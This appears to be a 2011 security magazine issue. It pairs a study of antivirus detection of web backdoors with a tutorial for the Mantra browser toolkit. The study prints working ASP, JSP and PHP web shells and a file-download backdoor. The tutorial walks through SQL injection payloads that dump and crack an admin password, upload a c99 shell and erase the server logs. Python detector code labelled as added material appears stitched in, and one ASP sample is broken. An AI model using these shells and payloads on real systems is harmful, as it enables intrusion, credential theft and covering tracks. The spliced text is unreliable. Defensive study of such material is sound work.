Issue 13 – Feb 2011 | Page - 1
Effectiveness of Antivirus in Detecting Web Application Backdoors
Abstract
This paper gives a detailed idea of the effectiveness of Antivirus software in detecting various Web Application backdoors that widely affect Web Servers. The analysis would prove the inefficiency of current Antivirus techniques in detecting Web Application backdoors and its consequences.
Introduction
Considering the increased number of attacks on Web Applications and the defacement statistics on Web Servers, it's high time to review the security of Web Servers and the protection mechanisms used to defend them. The Zone-H report at http://www.zone-h.org/news/id/4735 says that the defacement count doubles every year. They also add that the methodologies used to gain access are still the same: "Application Layer Vulnerabilities". Let's not go into application vulnerabilities but instead take a look at the very common web application backdoors that are commonly used by hackers, and how the Antivirus software widely used on many Web Servers is incapable of detecting them.
Diagram - 001
Normally an attack goes like Diagram 001, where the attacker finds a vulnerability in a hosted web application and manages to upload a malicious application backdoor in one of the server's supported languages, like ASP, PHP, ASP.NET, JSP etc. This gives him control over the entire Web Server. Firewalls and Antivirus software are always part of a network. Firewalls are mostly not asked to monitor web traffic, so the only security measure the Web Servers depend upon for this is the Antivirus. We will go into a detailed analysis of common web application backdoors and how AVs fall short in catching them.
Antivirus Detection Mechanisms and Where They Lack
Signature Based Detection
In this technique the Antivirus software needs to have the signature of the backdoor, and for that the companies should already have a copy of the backdoor for analysis.
Reasons behind the ineffectiveness of "Signature Based" detection of Web Backdoors:
1) Signature based detection works fine with self-propagating worms, as their mass spreading mechanism will in some way make it to the AV companies too. But that's not the case with web backdoors: they don't have any self-spreading mechanism and they are only targeted on a particular server, and thus the signatures of the most common backdoors remain unknown.
2) The signatures are not built based on instructions like in PEs, but instead using strings and function calls. Simply renaming a function call or string, or changing the order of the program, can prove to be enough to bypass the "Signature Based Detection" approach.
Note: Given below are some samples analyzed for example purposes. All the samples analyzed were downloaded from a collection of common web backdoors archive found on the internet a few years back. Virus Total was used for this analysis.
Test # 1.1
Objective: Test on an old and popular backdoor, which proves that popularity matters for detection
Backdoor / File name: C99.php
Description: A very old and widely used backdoor having a great number of options. Born some 12 years ago, signatures are available with most of the Antivirus software.
Analysis: Shows that 81% of AVs detect the old man
File name: c99_locus7s.php
Submission date: 2010-12-27 08:06:42
Result: 34/42 (81.0%)
Test # 1.2
Objective: Prove that Signature based detection is very easy to bypass when it comes to detecting web application backdoors, as it's based on strings.
Description: Web backdoors built in scripting languages are easy to bypass; the signatures are not built based on instructions like in PEs, but instead using strings and function calls. Simply renaming a function call or changing the order of the program would be enough to bypass the AV. A second test was done by simply removing the change logs (author's name and update logs) from the top of the script, and the reanalysis showed that only 27 AVs detected it now.
File name: c99_locus7s.php
Submission date: 2011-01-25 12:17:19
Result: 27/43 (62.8%)
Test # 2.1
Objective: Test on an old and not so popular backdoor to prove that it's really hard for web application backdoors to reach AV vendors for signature building
Description: Another pretty old sample was taken from the same web backdoor collection but with less functionality, although enough to deface a site
Analysis: Shows that only 2 AVs detect the backdoor.
File name: AK-74 Security Team Web Shell Beta Version.php
Submission date: 2011-01-25 17:33:25
Result: 2/43 (4.7%)
Test # 3.1
Objective: Signature based detection of Web Application backdoors is easy to bypass
Description: A test on another old and popular backdoor detected by all AVs. The aim is to try to make it undetectable by the AVs. An Active Server Pages simple command execution backdoor named cmdasp.asp was obtained from a very old archive, http://michaeldaw.org/projects/webbackdoor-compilation
Analysis: 81% of the AVs detected the script because of its popularity and the availability of a signature
File name: cmdasp.asp
Submission date: 2011-01-25 19:33:07
Result: 35/43 (81.4%)
Test # 3.2
Objective: Signature based detection of Web Application backdoors is easy to bypass
Description: The above mentioned sample, which contained some HTML code (just for formatting output), was edited in Notepad and the HTML contents were stripped off, leaving the actual backdoor code unhampered. Functions were also renamed, and then the backdoor was subjected to analysis.
//html striped cmdasp.asp
On Error Resume Next
dim resp
' -- create the COM objects that we will be using -- '
Set woot = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
resp = woot.Run ("cmd.exe /c " dir, 0, True)
Response.Write Server.HTMLEncode(resp)
Analysis: The analysis showed that stripping the useless plain HTML from the ASP code and renaming the functions made it undetectable by all the AVs while still providing full functionality
File name: test2.asp
Submission date: 2011-01-25 19:57:03
Result: 0/43 (0.0%)
Heuristics Based Detection
Not many Antivirus vendors depend upon heuristics for Web backdoor detection. Only a few prominent and leading Antivirus products employ this detection.
Why is heuristics based detection not employed when it comes to Web Applications?
1) Heuristics detection is based on dynamic analysis and is always considered risky as the chances of false positives are very high, and when it comes to Web Applications, the risk is pretty high
2) Web Applications undergo updates and changes more frequently as compared to PE files, and the methodologies used for PE detection cannot be fully utilized here
3) Executables can be legitimately signed in the case of PEs, but that's not possible with Web Scripts
4) Static analysis on PEs, based on a few critical and exceptional APIs, cannot be used for static heuristic detection. In a Web Application, even one flag on such a function call will get legitimate code blacklisted
5) Dynamic analysis at runtime is not used on scripting languages as the code is interpreted
6) Threat classification and Risk Analysis for Web Applications is hard to automate
To analyze the above, let's discuss a few common features of Web Application backdoors. A Web backdoor would have some or all of the following features:
1) Execute System Commands On The Web Server
2) Traverse Directories And View/Edit Files And Programs
3) Upload Feature – Helpful In Local Privilege Escalation
4) Download Documents And Files
5) Registry Editing
6) Execute A Reverse Connect, Bind Shell
7) Database Management
A Web backdoor with the first feature [Execute commands] will itself be capable enough to perform the rest of the features, in one way or other. So let's discuss that further. Command execution is possible with almost all scripting languages, that is, if certain default functions are not disabled on the environment, depending upon the language. Also, all except [1], [6] and [7] are legitimate Web Application behaviors, so there is greater possibility of getting detected.
Test # 4.1
Objective: Testing simple command execution backdoors in JSP and PHP using default system command execution functions, and analyzing the efficiency of Antivirus in static heuristic detection
Command Execution shell in .jsp that can be compiled to .war java web archive format.
// cmd.jsp
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>
</pre>
</BODY></HTML>
Analysis: No Antivirus detected it
File name: cmd.jsp Submission date: 2011-01-25 21:32:32 (UTC) Result: 0/ 43 (0.0%)
Test # 4.2
Objective: Command Execution shell in PHP which can be added to an already existing PHP file and can process request via User-Agent header
<?php passthru(getenv("HTTP_ACCEPT_LANGUAGE")); echo '<br> Fb1h2s'; ?>
Analysis: No Antivirus detected it
File name: accept_lanaguage.php
Submission date: 2011-01-25 21:36:20 (UTC)
Result: 0/43 (0.0%)
The above analysis shows that even though the getRuntime().exec and passthru() functions were present in the code, the static analysis of the AVs was not able to detect those critical function calls. Threat classification and Risk Analysis for Web Applications is hard to automate. It becomes hard to detect which piece of code is legitimate and which one is not. Consider the following test.
Test # 4.3
Objective: Classifying a threat. Run time analysis is not possible on Web Backdoors
Description: Given below is a simple program in JSP that can download files from the server. Downloading a file from a web server is a legitimate activity and cannot be used as a reason for heuristic detection. But what if the program tries to download a configuration file or other critical files from the server? These kinds of backdoors cannot be detected unless a runtime analysis is performed, and hence a lack of detection is observed.
Code: Download File from server
// Download_file.jsp by fb1h2s
<%@ page import="java.util.*,java.io.*"%>
<%
File f = new File (request.getParameter("d"));
response.setContentType ("application/ear");
response.setHeader ("Content-Disposition", "attachment; filename=\"fb1h2s.bak\"");
InputStream in = new FileInputStream(f);
ServletOutputStream outs = response.getOutputStream();
int bit = 2555555;
int i = 0;
while ((bit) >= 0) {
    bit = in.read();
    outs.write(bit);
}
outs.flush();
outs.close();
in.close();
%>
Analysis: No antivirus scanners detected it [Static and heuristics scan] due to inefficiency of detecting web backdoors at runtime. The above program is a threat, and these kinds of backdoors are hard to detect by automated AVs, unless there is a policy created for files and folders regarding accessibility
File name: download_jsp.war
Submission date: 2011-01-26 3:36:20
Result: 0/43 (0.0%)
Conclusion
Web applications and the environments hosting them are growing rapidly, and the necessity of providing improved security is increasing. Current Antivirus software is proved to be inadequate in detecting Web Application backdoors. These factors add up to the need for Antivirus vendors to become apprised of Web backdoors and to improve specialized detection techniques. Web Server administrators also need to be advised not to fully depend on native AV/Firewalls for preventing Web intrusions.
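The static check that Tests 4.1 to 4.3 found missing can be sketched as below: an added example (not the paper's code and not any AV vendor's engine) that reports command-execution calls, and file-open calls whose argument comes from the HTTP request, so removed banners and stripped HTML do not change the result. The rule set, the severity labels and the sample strings, which are inert text modeled on the test files above, are assumptions constructed for illustration.

```python
import os
import re

# Rules per file extension (assumed, not exhaustive). "exec" sinks pass a string
# to the operating system; "file" sinks open a path. Every sink pattern ends at
# the opening parenthesis so the call's argument text can be examined.
RULES = {
    ".php": {
        "exec": r"(?<![\w>:$])(?:passthru|system|shell_exec|exec|popen|proc_open)\s*\(",
        "file": r"(?<![\w>:$])(?:readfile|fopen|file_get_contents)\s*\(",
        "source": r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b|getenv\s*\(\s*[\"']HTTP_",
    },
    ".jsp": {
        "exec": r"getRuntime\s*\(\s*\)\s*\.\s*exec\s*\(|new\s+ProcessBuilder\s*\(",
        "file": r"new\s+File(?:InputStream|Reader)?\s*\(",
        "source": r"request\s*\.\s*get(?:Parameter|Header)\s*\(",
    },
    ".asp": {
        "exec": r"\.\s*(?:run|exec)\s*\(|createobject\s*\((?=\s*\"wscript\.shell\")",
        "file": r"\.\s*opentextfile\s*\(",
        "source": r"\brequest\s*(?:\.\s*(?:form|querystring)\s*)?\(",
    },
}


def call_args(text, open_idx):
    """Return the text between the '(' at open_idx and its matching ')'.
    Parentheses inside string literals are not treated specially."""
    depth = 0
    for i in range(open_idx, len(text)):
        if text[i] == "(":
            depth += 1
        elif text[i] == ")":
            depth -= 1
            if depth == 0:
                return text[open_idx + 1:i]
    return text[open_idx + 1:]


def scan_source(filename, text):
    """Return sorted (line, kind, severity) findings for one script."""
    rules = RULES.get(os.path.splitext(filename)[1].lower())
    if rules is None:
        return []
    source = re.compile(rules["source"], re.I)
    # Variables assigned directly from a request value count as tainted.
    assign = r"([$\w]+)\s*=(?!=)[^;\n]*?(?:" + rules["source"] + ")"
    tainted = {m.group(1) for m in re.finditer(assign, text, re.I)}
    findings = []
    for kind in ("exec", "file"):
        for m in re.finditer(rules[kind], text, re.I):
            args = call_args(text, m.end() - 1)
            from_request = bool(source.search(args)) or any(
                re.search(r"(?<![\w$])" + re.escape(v) + r"(?!\w)", args)
                for v in tainted)
            if kind == "exec":
                severity = "high" if from_request else "review"
            elif from_request:
                severity = "review"   # legitimate pattern, but path is client-chosen
            else:
                continue              # fixed-path file access is not reported
            line = text.count("\n", 0, m.start()) + 1
            findings.append((line, kind, severity))
    return sorted(findings)


def scan_tree(root):
    """Scan every .php/.jsp/.asp file under a web root."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in RULES:
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_source(name, fh.read())
                if hits:
                    report[path] = hits
    return report


# Constructed, inert sample strings modeled on the files in Tests 3.2 to 4.3,
# plus one benign script (gallery.php is a made-up name).
SAMPLES = {
    "cmd.jsp": '<% Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); %>',
    "accept_language.php": '<?php passthru(getenv("HTTP_ACCEPT_LANGUAGE")); ?>',
    "test2.asp": 'Set woot = Server.CreateObject("WSCRIPT.SHELL")\n'
                 'resp = woot.Run ("cmd.exe /c dir", 0, True)',
    "download_file.jsp": '<% File f = new File(request.getParameter("d"));\n'
                         'InputStream in = new FileInputStream(f); %>',
    "gallery.php": '<?php $id = (int)$_GET["id"];\n'
                   '$img = fopen("/srv/img/default.png", "rb"); ?>',
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, scan_source(name, text))
```

The download script from Test 4.3 is reported only as "review", which reflects the classification problem described above: the call is legitimate and only the request-controlled path makes it worth a second look.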
FB1H2S aka Rahul Sasi
http://fb1h2s.com
http://garage4hackers.com
Rahul Sasi is a person highly passionate about Ethical hacking, and is working as an Info Security Consultant.
Mantra – Free and Open Source Security Framework
What is Mantra?
Mantra is a collection of hacking tools, add-ons, and scripts based on Firefox. Right from the beginning, one of the attractive features which made both Firefox and Google Chrome outstanding was their expandability by means of installing useful extensions or add-ons. Programmers and developers started coding add-ons which helped to make the online web easier and more functional. Naturally, there were add-ons developed for hackers too. Some went out of date, some were very powerful, and some went unnoticed despite their powerful capabilities. We tried to get all the add-ons of this type available out there on the internet, installed, analyzed and ranked them, and after that included them in our own security toolkit. Looking at the total number of exploits getting added to the exploit db, we think that an exploit development framework based on the browser can get very good acceptance from the security and hacking communities, and this triggered the making of Mantra. As of now Mantra is just a security toolkit rather than a full-fledged framework. We think it's always better to give a choice to the end user rather than providing what we think is the best. So once the community is up and we have a crowd, we will go ahead and finalize the basic criteria for the framework and will work on their behalf.
Some of the features of Mantra
1. It's built on top of the browser - Saves lots of man power and learning curve.
2. It is cross platform and flexible - It can easily run on Windows, Mac and Linux natively
3. It's free as in "free beer" and "free speech"
4. It's open source, so you are free to use it or modify it your own way.
What is the use?
According to the present age standards, Mantra can be helpful to perform all five phases of attacks like reconnaissance, scanning and enumeration, gaining access, escalation of privileges, maintaining access and covering tracks.
What Mantra is NOT?
1. It's not a one click automatic pwnage tool (please don't think that it's a stick in a magician's hand. It may be possible for us to make it a one click pwnage tool, at least for some common types of attacks, in the future. But not now)
2. It's not mature enough to serve "everything" for a user to perform any sort of attack
3. It can't be used as a replacement for your normal browser. It's not fast enough, does not have plenty of space to play with etc.
4. You can find that there is more than one tool present in the toolkit for performing the same sort of attacks, but at the same time it lacks some simple tools here and there.
Who needs it?
Nice question. If you are into auditing, vulnerability assessment, penetration testing or information security training etc., you are going to benefit from this project. We are looking to bring the attention of security researchers to the possibility of such a platform. If many people use it, the community will definitely grow and we will be able to see more powerful, functional and targeted tools in the near future.
How you can contribute?
Since it's an open source project, you are encouraged to become a part of it. We need developers for writing code and modifying the extension framework, theme designers for artwork, and documentation writers to help better promote the project.
Close Look
The beta version of Mantra Security Toolkit can be downloaded from http://getmantra.com/download/. As of now it's available for both Linux and Windows platforms. It comes as a self-extracting archive and needs almost zero setup. The graphical user interface provided by Mantra security toolkit is straightforward and easy to use. The navigation bar is placed on top of the toolkit and it integrates the search bar into it. Search engines can be switched easily by using keywords or by clicking on their respective icons. As of now it supports searching on XSSed, SecurityFocus, OSVDB, PacketStorm, Pcapr, Exploit-DB, Scroogle, RFC, OVAL etc., apart from normal search engines. It also supports autocomplete and real-time search suggestions.
The sidebar is located on the right side of the toolkit and gives one click access to all the tools available in the toolkit. Tools can be fine tuned according to the user's needs from the sidebar itself. You can see all the tools packed into it at http://getmantra.com/tools/ The status bar on the bottom gives various information about the current webpage including remote IP, location details, technologies used etc. More details about a particular piece of information can be obtained by simply clicking on the respective notification on the status bar. There are also a proxy button, to switch between proxies, a Passive Reconnaissance button, to conduct packet-less discovery of target resources, a quick profile switcher to play with cookies etc.
A quick demo
In this particular demo we will try to root a remote web server using Mantra security toolkit. Due to space limitation, I have not included the screen shots. To view them please follow the image links mentioned under every step.
Step 1:
I'm on the home page of the website now.
[code]http://192.168.132.128/[/code]
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar1.jpg[/img]
Step 2:
As of now Mantra does not have any crawling mechanism to find vulnerable URLs on the website (read it as a limitation). So we have to do that manually. I went through all the pages of the web site and found a page with URL input
[code]http://192.168.132.128/?id=13[/code]
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar2.jpg[/img]
Step 3:
I launched Hackbar by pressing F9. Hackbar is a tool for doing basic audits on web pages.
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar3.jpg[/img]
Step 4:
The power of single quote. I'm checking whether the web site is actually sanitizing the input or not by putting a ' at the end of the URL and pressing the Execute button.
[code]http://192.168.132.128/?id=13'[/code]
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar4.jpg[/img]
Since the page content is different from the previous one, I can make sure that the web page is not sanitizing the input from the URL.
Step 5:
Let's find out the number of tables in the current database.
[code]http://192.168.132.128/?id=13 order by 1[/code]
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar6.jpg[/img]
Step 6:
I have to keep on increasing the last number till I see any changes in the page. In usual practice it's going to be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press the + button till I see any changes on the webpage
[code]http://192.168.132.128/?id=13 order by 7[/code]
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar7.jpg[/img]
Step 7:
I went up to 7 and no change till now.
[code]http://192.168.132.128/?id=13 order by 7[/code]
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar12.jpg[/img]
Step 8:
I'm on 8 now and now I can see the page changed.
[code]http://192.168.132.128/?id=13 order by 8[/code]
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar13.jpg[/img]
Step 9:
Now let's go ahead and make a UNION statement. I can make it easily by going to SQL > UNION SELECT STATEMENT
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar14.jpg[/img]
Step 10:
I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exist and there are only 7 tables.
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar16.jpg[/img]
Step 11:
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Let's take the number 2.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7[/code]
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar19.jpg[/img]
Step 12:
I replaced number 2 in URL with another SQL command, it got executed and the result is displayed on the page.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7[/code]
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar21.jpg[/img]
The current user is cms_user@localhost.
Step 13:
Let's find out the version of the database. I replaced 2 in the URL with version() command.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7[/code]
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar22.jpg[/img]
5.0.45 is the version
Step 14:
Let me list all the tables.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables[/code]
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar23.jpg[/img]
From this list I found "user" as an interesting table.
Step 15:
Now I listed all the columns and it's a big list.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns[/code]
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar24.jpg[/img]
Step 16:
I want to filter out columns from the table "user".
[code]http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'[/code]
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar25.jpg[/img]
Step 17:
Let's find the user name.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user[/code]
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar27.jpg[/img]
Step 18:
And password, of course.
[code]http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user[/code]
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar26.jpg[/img]
It's encrypted.
Step 19:
Decrypting the password. I'm making a guess here that the password is encrypted using MD5 by looking at the length and other parameters of the data. I copied the MD5 hash, pasted it into the hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar30.jpg[/img]
Step 20:
Voila.!!! I got the password!
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar31.jpg[/img]
Step 21:
Finding the log in page. It was right in front of me
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar32.jpg[/img]
Step 22:
Logging in with the credentials I have
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar33.jpg[/img]
Step 23:
Greetings.!!!
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar35.jpg[/img]
Step 24:
I'm an admin now. Look at my powers.
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar36.jpg[/img]
Step 25:
Let me add an event.
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar37.jpg[/img]
Step 26:
And of course I want to upload a picture.
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar38.jpg[/img]
Step 27:
Let me test the filtering mechanism of the website again. I'm trying to upload a PHP shell using the facility of the website to upload a custom picture. Let's see whether it's possible or not.
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar39.jpg[/img]
Step 28:
Now I'm pressing on the "Add Event" button.
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar40.jpg[/img]
Step 29:
Nice. Looks like it's got uploaded.
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar41.jpg[/img]
Step 30:
Let's see where the shell got uploaded to.
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar42.jpg[/img]
Step 31:
I'm trying to get the default upload location.
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar43.jpg[/img]
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar44.jpg[/img]
Step 32:
Looks like I got it.
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar45.jpg[/img]
Let me click on the c9shell.php file I just uploaded.
Step 33:
Voila. I have shell access!!
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar46.jpg[/img]
Step 34:
I simply clicked on the up button to get the root folder.
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar48.jpg[/img]
Now I can do whatever I wish. Deface the website, maintain access or whatever.
Step 35:
What I'm interested in is the log folder.
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar49.jpg[/img]
Step 36:
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks.
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar51.jpg[/img]
Step 37:
Let me go back and edit the log file.
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar52.jpg[/img]
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar53.jpg[/img]
Step 38:
I deleted the complete log entries. Now saving it.
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar54.jpg[/img]
Step 39:
Nice. Log file is empty now.
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar56.jpg[/img]
Step 40:
Now, let's remove the c99 shell by pressing on Self Remove.
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar57.jpg[/img]
Step 41:
Confirmed!!!
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar58.jpg[/img]
Step 42:
OK. Good Bye C99!!!
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar59.jpg[/img]
Step 43:
Well. It got deleted itself.
[img]http://i941.photobucket.com/albums/ad251/Abhi1299/Mantra%20Hackbar%20Tutorial/mantrahackbar60.jpg[/img]
Happy Hacking.!!! :-)
If you have any suggestion or query please mail us at contact@getmantra.com
Or you can also contact us at:
getmantra.com/forums
twitter.com/getmantra
facebook.com/pages/Mantra/170787489627527
Abhi M Balakrishnan
Abhi M Balakrishnan is an Electronics hobbyist turned Hacktivist, working as an Information Security Consultant to put food on his table and a roof over his head, and has performed several security consulting assignments in the areas of penetration testing, code reviews, web application assessments, security architecture reviews etc.
Yashartha Chaturvedi Yashartha Chaturvedi is an Independent cyber security consultant, believes in ethical hacking, provides innovative solutions and knowledge based training to secure computer/mobile from cyber criminals, having an aim to educate the common internet user against the most dangerous security loopholes,vulnerabilities and attacks by publishing regular updates/patches.
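Step 36 of the Mantra demo notes that the requests from Steps 4 to 18 were all recorded in the site's log. The following added example (not part of the original article or of Mantra) groups access-log lines by client and raises an alert on that request pattern; the log format, client addresses, thresholds and sample lines are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Common/combined access-log prefix: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

# Indicators are matched against the URL-decoded, lower-cased query string.
INDICATORS = [
    ("quote-probe", re.compile(r"=[^&]*'\s*(?:&|$)")),            # Step 4
    ("order-by-sweep", re.compile(r"\border\s+by\s+(\d+)")),      # Steps 5-8
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("schema-enum", re.compile(r"\binformation_schema\.")),       # Steps 14-16
    ("db-function", re.compile(r"\b(?:user|version|database)\s*\(\s*\)")),
]


def analyse(lines, min_indicators=2, min_sweep=3):
    """Return {client_ip: summary} for clients whose requests show at least
    min_indicators distinct indicators, or an ORDER BY sweep over at least
    min_sweep different column numbers."""
    clients = defaultdict(lambda: {"indicators": set(), "order_by": set(),
                                   "requests": 0, "first": None, "last": None})
    for line in lines:
        m = LOG_RE.match(line)
        if not m or "?" not in m["target"]:
            continue
        query = unquote_plus(m["target"].split("?", 1)[1]).lower()
        hits = [(name, rx.search(query)) for name, rx in INDICATORS]
        hits = [(name, h) for name, h in hits if h]
        if not hits:
            continue
        c = clients[m["ip"]]
        c["requests"] += 1
        c["first"] = c["first"] or m["ts"]
        c["last"] = m["ts"]
        for name, h in hits:
            c["indicators"].add(name)
            if name == "order-by-sweep":
                c["order_by"].add(int(h.group(1)))
    return {ip: c for ip, c in clients.items()
            if len(c["indicators"]) >= min_indicators
            or len(c["order_by"]) >= min_sweep}


# Constructed log lines: one client replaying the demo's request shapes, one
# ordinary visitor whose search text happens to contain "order by".
SAMPLE_LOG = """\
198.51.100.7 - - [25/Jan/2011:10:00:01 +0000] "GET /?id=13 HTTP/1.1" 200 5120
198.51.100.7 - - [25/Jan/2011:10:00:09 +0000] "GET /?id=13%27 HTTP/1.1" 200 812
198.51.100.7 - - [25/Jan/2011:10:00:20 +0000] "GET /?id=13%20order%20by%201 HTTP/1.1" 200 5120
198.51.100.7 - - [25/Jan/2011:10:00:31 +0000] "GET /?id=13%20order%20by%207 HTTP/1.1" 200 5120
198.51.100.7 - - [25/Jan/2011:10:00:35 +0000] "GET /?id=13%20order%20by%208 HTTP/1.1" 200 812
198.51.100.7 - - [25/Jan/2011:10:01:02 +0000] "GET /?id=13%20UNION%20SELECT%201,2,3,4,5,6,7 HTTP/1.1" 200 5240
198.51.100.7 - - [25/Jan/2011:10:01:30 +0000] "GET /?id=13%20UNION%20SELECT%201,user(),3,4,5,6,7 HTTP/1.1" 200 5251
198.51.100.7 - - [25/Jan/2011:10:02:10 +0000] "GET /?id=13%20UNION%20SELECT%201,table_name,3,4,5,6,7%20from%20information_schema.tables HTTP/1.1" 200 9120
203.0.113.5 - - [25/Jan/2011:10:02:15 +0000] "GET /?id=14 HTTP/1.1" 200 4988
203.0.113.5 - - [25/Jan/2011:10:02:40 +0000] "GET /search?q=order+by+price HTTP/1.1" 200 2210
""".splitlines()

if __name__ == "__main__":
    for ip, summary in analyse(SAMPLE_LOG).items():
        print(ip, sorted(summary["indicators"]), sorted(summary["order_by"]),
              summary["first"], "->", summary["last"])
```

Because Steps 37 to 39 show the on-host log being emptied, a check like this is only useful on a copy of the log forwarded off the web server as it is written.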
Application Security – Basics
